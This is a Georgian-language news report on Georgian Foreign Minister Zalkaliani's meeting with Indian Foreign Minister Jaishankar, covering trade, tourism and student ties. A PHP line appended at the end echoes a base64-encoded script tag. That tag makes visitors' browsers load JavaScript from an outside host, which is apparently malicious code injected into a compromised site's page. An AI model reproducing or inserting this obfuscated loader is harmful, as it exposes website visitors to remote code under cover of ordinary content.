celsiusi
ავერსი შნაიდერი
საქართველოს ვიცე-პრემიერი, საგარეო საქმეთა მინისტრი დავით ზალკალიანი ინდოელ კოლეგას, საგარეო საქმეთა მინისტრს სუბრაჰმანიამ ჯაიშანკარს შეხვდა.
 
მინისტრებმა ხაზი გაუსვეს საქართველოსა და ინდოეთს შორის ორმხრივი ურთიერთობების მზარდ დინამიკას და მათ მნიშვნელობას სხვადასხვა, მათ შორის პოლიტიკურ, ეკონომიკურ, კულტურულ, განათლებისა და საკანონმდებლო სფეროებში. მათ ასევე ისაუბრეს და დადებითად შეაფასეს ორი ქვეყნის თანამშროლობა ინვესტიციების, ტურიზმის, ტრანსპორტის, სოფლის მეურნეობის, ინფორმაციული ტექნოლოგიებისა და კომუნიკაციის და ინოვაციების სფეროებში.
 
„დავასრულე მოლაპარაკებები საქარველოს ვიცე-პრემიერთან, საგარეო საქმეთა მინისტრთან. ძალიან კარგი მოლაპარაკებები იყო, განვიხილეთ ეკონომიკური თანამშრომლობა, თანამშრომლობა ტურიზმის და ვაჭრობის სფეროებში. ჩვენი ურთიერთობები წარმატებულია. შევთანხმდით, რომ განვაგრძობთ ერთობლივ მუშაობას, რათა გამოვნახოთ თანამშრომლობის განვითარების გზები. მე ვიცე-პრემიერი ინდოეთში მოვიწვიე და ვთხოვე, რომ ბიზნეს დელეგაციით ეწვიოს ქვეყანას.
 
აუცილებელია ინდოელმა ხალხმა მეტი გაიგოს საქართველოს შესახებ, განსაკუთრებით საქართველოს მაღალი რეიტინგების და ბიზნეს კეთების სიმარტივის შესახებ. დარწმუნებული ვარ, რომ ჩემი ვიზიტი, რომელიც ინდოეთის საგარეო საქმეთა მინისტრის პირველი ვიზიტია საქართველოში, ხელს შეუწყობს თანამშრომლობის ახალ ეტაპზე გადასვლას და საქართველოს და ინდოეთის შესანიშნავი ურთიერთოებები კიდევ უფრო მაღალ დონეზე ავა”-განაცხადა ინდოეთის საგარეო საქმეთა მინისტრმა ქართველ კოლეგასთან დავით ზალკალიანთან შეხვედრის დასრულების შემდეგ.
 
სუბრაჰმანიამ ჯაიშანკარის განცხადებით, ინდოეთი საქართველოში დიდ პროექტებს ახორციელებს, ენეგეტიკისა და მეტალურგიის სფეროში. ასევე დიდია ინდოელი ტურისტების რაოდენობა საქართველოში, რაც 50 000 მეტ ტურისტს შეადგენს. ამასთან 8 000 ინდოელი სტუდენტი სწავლობს საქართველოში. მისი თქმით, ორ ქვეყანას ყველა სფეროში შეუძლია თანამშრომლობის განვითარება.
1380
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");